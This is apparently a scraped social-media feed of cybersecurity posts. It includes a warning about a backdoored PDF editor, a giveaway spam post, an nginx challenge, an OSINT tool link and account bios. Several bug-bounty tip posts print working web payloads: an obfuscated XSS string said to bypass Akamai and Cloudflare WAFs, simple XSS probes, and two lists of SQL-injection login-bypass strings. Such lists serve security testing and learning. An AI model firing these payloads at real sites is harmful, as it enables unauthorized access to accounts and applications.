⚠️ Trojan in disguise: PDF editor backdoor
The “AppSuite PDF Editor” poses as a legit tool but is a backdoor: most of its code supports malware functions, including C2 comms, scheduled tasks, and AES-encrypted data exfiltration.
Persistence is full, cleanup needs system repave.…
1. Data Scientist toolbox :
Give Away Alert!!
1. Artificial Intelligence
2. Machine Learning
3. Cloud Computing
4. Ethical Hacking
5. Data Analytics
6. AWS Certified
7. Data Science
8. BIG DATA
9. Python
10 MBA
For 24 Hours only!
To get it:
1. Like, Retweet and…
🚨 NGINX Misconfiguration Challenge 🚨
I created a vulnerable nginx.conf for learning purposes 🔥
Can you find and explain at least one vulnerability? Bonus points if you find them all 😎
Drop your findings in the comments 👇
OSINT cheat sheet, list OSINT tools, wiki, dataset, article, book , red team OSINT for hackers and OSINT tips and OSINT branch. (Just Sharing)
Credit: github.com/Jieyab89/OSINT…
I just found a WAF bypass for Akamai and Cloudflare:
<address onscrollsnapchange=window['ev'+'a'+(['l','b','c'][0])](window['a'+'to'+(['b','c','d'][0])]('YWxlcnQob3JpZ2luKQ==')); style=overflow-y:hidden;scroll-snap-type:x><div style=scroll-snap-align:center>1337</div></address>
Bypass Auth- Via SQL Injection Payloads #bugbountytips#bugbountytips
' or 'a'='a
' or a=a--
' or a=a–
') or ('a'='a
" or "a"="a
") or ("a"="a
') or ('a'='a and hi") or ("a"="a
' or 'one'='one
' or 'one'='one–
' or uid like '%
' or uname like '%
' or userid like '%
⚠️wpprobe - WPProbe is a fast and efficient WordPress plugin scanner that leverages REST API enumeration (?rest_route) to detect installed plugins without brute-force.
🖥github.com/Chocapikk/wppr…
✅Join Telegram For More Content: t.me/brutsecurity…
Ethical Hacking Reminder
Bypass XSS WAF protection using invisible separators before or after function name
<img/src/onerror=alert(1337)>
<svg/onload= alert(2)>
SQL Injection - payloads by Auth Bypass
' OORR 1<2 #
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
#bugbountytips #bugbountytip
488 Followers 2K FollowingWe publish content on #cybersecurity #technology #cloudcomputing #devops. Stay ahead of the curve with our news and insights.
1K Followers 808 FollowingInitiative of @viralparmarhack under CCS Foundation to provide a proper platform for cyber security researchers & like-minded people to establish a community.
247K Followers 3K FollowingStart here. Go anywhere. Learn with Cisco accelerates your success, including #CCNA #CCNP #CCIE #CCDE Specialist & #DevNet. Use #CiscoCert to join conversation.
19K Followers 9 FollowingAccount is no longer active: 2022-Oct-17.
Follow @ExploitDB
Google Hacking Database - queries to uncover interesting, usually sensitive, public information.
3K Followers 25 FollowingWe offers Cyber Security Training 📚✏, Penetration Testing, and Bug Bounty Tips💰 to protect businesses and individuals from cyber attacks.
Feel Free to Ask.
65K Followers 2 FollowingThis is an unofficial HackerOne public disclosure watcher who keeps you up to date about the recently disclosed bugs. By @NOBBD
36K Followers 184 FollowingNuclei uses a vast templating library to scan applications, cloud infrastructure, and networks to find and remediate vulnerabilities.
187K Followers 6K FollowingThe leading provider of crowdsourced cybersecurity solutions purpose-built to secure the digitally connected world...Unleash Ingenuity™
233K Followers 1K FollowingCofounder @hackinghub_io | Advisor @CaidoIO. I hack companies and make content about it. #NahamCon organizer. ex @hacker0x01🇮🇷
No recent Favorites. New Favorites will appear here.